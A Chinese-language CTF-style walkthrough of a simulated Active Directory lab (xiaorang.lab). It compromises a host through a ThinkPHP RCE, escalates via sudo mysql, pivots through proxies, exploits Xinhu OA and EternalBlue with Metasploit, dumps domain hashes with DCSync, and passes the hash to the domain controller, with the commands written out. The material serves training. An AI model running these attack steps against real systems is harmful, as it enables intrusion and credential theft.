一次完整的实战域渗透

admin 2024年6月11日16:58:30评论54 views字数 2965阅读9分53秒阅读模式

一次完整的实战域渗透

前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
    朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把LHACK安全“设为星标”,否则可能就看不到了啦!

一次完整的实战域渗透

当然哦,还是用靶机吧,希望大家都保护好自己,哈哈哈

0x01 开启环境

一次完整的实战域渗透

0x02 web渗透

开启环境,访问web页面。

一次完整的实战域渗透

发现登录功能是个鸡肋,翻看别的功能点。

一次完整的实战域渗透

查看到这个熟悉的log,猜测可能存在框架漏洞。

一次完整的实战域渗透

使用漏洞利用工具进行探测。

一次完整的实战域渗透

发现存在thinkphp5.0.23漏洞,成功拿下webshell。

一次完整的实战域渗透

0x03 内网渗透

尝试suid提取,无结果。

find / -perm -u=s -type f 2>/dev/null

尝试sudo提取。

一次完整的实战域渗透

发现这个mysql是一个利用点。

https://gtfobins.github.io/

查看提权命令

一次完整的实战域渗透

sudo mysql -e '! find / -name flag*'

一次完整的实战域渗透

sudo mysql -e '! cat /root/flag/flag01.txt'

一次完整的实战域渗透

拿下flag1。

继续信息收集。

ip a

一次完整的实战域渗透

发现有一个内网网段,上传fscan,进行内网扫描。

./fscan -h 172.22.1.0/24 >> 1.txt
打开查看结果
172.22.1.18:135 open172.22.1.21:135 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.15:80 open172.22.1.15:22 open172.22.1.18:3306 open172.22.1.2:88 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin[*] OsInfo 172.22.1.2   (Windows Server 2016 Datacenter 14393)[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1已完成 14/14[*] 扫描结束,耗时: 11.656481329s
探测出内网其他的资产。

现在我们总结一下

172.22.1.2-DC域控172.22.1.21-Windows的机器并且存在MS17-010 漏洞172.22.1.18-》信呼OA办公系统

现在进行内网穿透。

第一种用 NPS进行代理转发。

https://blog.csdn.net/qq_44159028/article/details/122719330

第二种chisel同ew相似但是更稳定

https://blog.csdn.net/weixin_43093631/article/details/118273506

也可以用frp等等,都可以用 只要版本对应上就行。

一次完整的实战域渗透

目标内网信呼OA。

弱口令 admin/admin123就成功登录了进去。

查找信呼OA漏洞,发现有一个RCE漏洞,这是第一种打法。

https://blog.csdn.net/solitudi/article/details/118675321

第二种做法是在扫目录基础上,利用/phpmyadmin,可以直接 root/root 登录,然后利用日志写入 webshell

这里就不再演示了。

https://blog.csdn.net/m0_48108919/article/details/123053622

通过RCE漏洞拿到webshell。(蚁剑连接的时候记得配置上代理)

一次完整的实战域渗透

拿下flag2。

接下来打永恒之蓝的漏洞。

使用msf,配置kali自带的proxychains。

https://www.cnblogs.com/junlin623/p/17442091.html

proxychains msfconsole走 socks5 流量,

proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp_uuidset RHOSTS 172.22.1.21exploit

得到正向的 meterpreter shell 后,接下来就是利用 DCSync

https://www.cnblogs.com/CoLo/p/16488892.html

最大的特点就是可以实现不登录到域控而获取域控上的数据。

在 MSF 下直接load kiwi,然后
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit 
导出域内所有用户的 Hash。

一次完整的实战域渗透

之前扫出来172.22.1.2的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec,

proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "$cmd"

最后一部分 flag 在/Users/Administrators/flag下

一次完整的实战域渗透

拿到flag3。

0x04 总结

web打点--》提权--》内网穿透--》内网渗透--》拿下域控。

该靶场对于新学内网的师傅还是挺友好的,除了最后拿下域控那一步,其余的都应该是常见的渗透手法。

以上为我的一些做题笔记,大佬勿喷。

感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。想要加交流群的师傅,主页加我,备注加群。

往期回顾
大型战役——>渗透实战(七)
直接上战场——>渗透实战(六)
来拿枪杆子——>渗透实战(五)
后台还有很多靶机,感兴趣的师傅们可以玩一玩。

原文始发于微信公众号(LHACK安全):一次完整的实战域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月11日16:58:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次完整的实战域渗透https://cn-sec.com/archives/2837788.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息